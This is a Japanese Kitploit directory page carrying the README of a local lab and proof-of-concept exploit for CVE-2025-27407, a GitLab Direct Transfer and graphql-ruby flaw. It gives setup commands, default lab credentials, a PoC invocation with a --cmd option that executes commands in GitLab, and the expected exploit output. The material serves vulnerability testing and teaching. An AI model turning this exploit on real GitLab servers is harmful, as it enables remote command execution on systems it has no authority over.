Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-27407 — CVE-2025-27407 のローカルラボおよび概念実証エクスプロイト。GitLab の GraphQL イントロスペクションスキーマローダーを Direct Transfer HTTP パス経由で標的とします。コンテナ化された環境と自動トリガースクリプトを含みます。 | Kitploit
ツール/GitHubGitHub/logggg2402/cve-2025-27407
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

CVE-2025-27407 のローカルラボおよび概念実証エクスプロイト。GitLab の GraphQL イントロスペクションスキーマローダーを Direct Transfer HTTP パス経由で標的とします。コンテナ化された環境と自動トリガースクリプトを含みます。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-27407 GitLab Podman ラボ

GitLab Direct Transfer HTTP パスが脆弱な graphql-ruby イントロスペクションスキーマローダーに到達することを実証するための、最小限のローカル専用ラボです。このラボは1つの脆弱な GitLab CE コンテナを実行します。PoC スクリプトはテスト中のみ、その偽の GitLab ソースサーバーをインプロセスで起動します。

自分が所有するシステム、または明示的にテスト許可を得たシステムに対してのみ実行してください。

ファイル

ファイル目的
lab.shGitLab ラボの起動、待機、検証、クリーンアップを行います。
poc_host_port_cmd.pyワンショット PoC: 偽のソースサーバー + GitLab ログイン/設定/インポートトリガー。

必要条件

  • podman がインストールされた Linux ホスト
  • curl
  • GitLab および PoC 偽装ソースサーバー用の空きローカルポート
  • GitLab Omnibus コンテナに十分な RAM/ディスク容量

デフォルト値:

ラボの起動

ポート 8080 がスクリプトのデフォルトです。他の何かが既に使用している場合は、ここに示すように 18080 を使用します。

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

GitLab を開く:

root@kitploit:~
http://127.0.0.1:18080

ログイン認証情報:

root@kitploit:~
root / Cve27407Password!

root はデフォルトのラボユーザーのみです。PoC トリガーは管理者アカウントを必要としません。宛先名前空間を作成/インポートできる認証済みユーザーであれば、脆弱な Direct Transfer パスにアクセスできます。--username と --password を使用して、管理者以外のユーザーでテストしてください。

PoC の実行

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

期待されるシグナル:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

オプション

環境変数の上書き

トラブルシューティング

  • 8080 がビジーの場合、./lab.sh up で GITLAB_HTTP_PORT=18080 を使用してください。
  • PoC がソースポートをバインドできない場合、--listen-port を未使用のポートに変更してください。
  • マーカー検証がバックグラウンドのインポートワーカーと競合する場合、--wait-seconds を増やすか、MARKER="$MARKER" ./lab.sh verify を再実行してください。
  • GitLab がまだ準備できていない場合、GITLAB_HTTP_PORT=18080 ./lab.sh wait を再実行してください。
  • 以前のラボがスタックしている場合、./lab.sh cleanup を実行してから再開してください。

クリーンアップ

root@kitploit:~
./lab.sh cleanup

これにより、GitLab コンテナ、以前のラボバージョンから残った偽ソースコンテナ、およびラボネットワークが削除されます。ダウンロードされた Podman イメージは削除されません。

ツールをダウンロード
項目デフォルト
GitLab イメージdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
GitLab コンテナcve-27407-gitlab
Podman ネットワークcve-2025-27407-net
GitLab root ユーザーroot
GitLab root パスワードCve27407Password!
マーカー/tmp/cve_2025_27407_gitlab_marker
オプション目的デフォルト
--host対象の GitLab ホスト必須
--port対象の GitLab HTTP ポート必須
--cmdGitLab ランタイムで実行するコマンドtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portローカルの偽ソースサーバーポート8001
--wait-seconds非同期 GitLab ワーカーのために偽ソースを維持する時間90
--usernameGitLab ユーザー名root
--passwordGitLab パスワードCve27407Password!
変数目的デフォルト
GITLAB_HTTP_PORTホスト/コンテナの GitLab HTTP ポート8080
GITLAB_SSH_PORTホストの GitLab SSH ポート2224
GITLAB_ROOT_PASSWORD初期 root パスワードCve27407Password!
GITLAB_IMAGE実行する GitLab イメージdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKPodman ネットワーク名cve-2025-27407-net
MARKERGitLab コンテナ内で確認するファイル/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDS準備完了待機のタイムアウト1200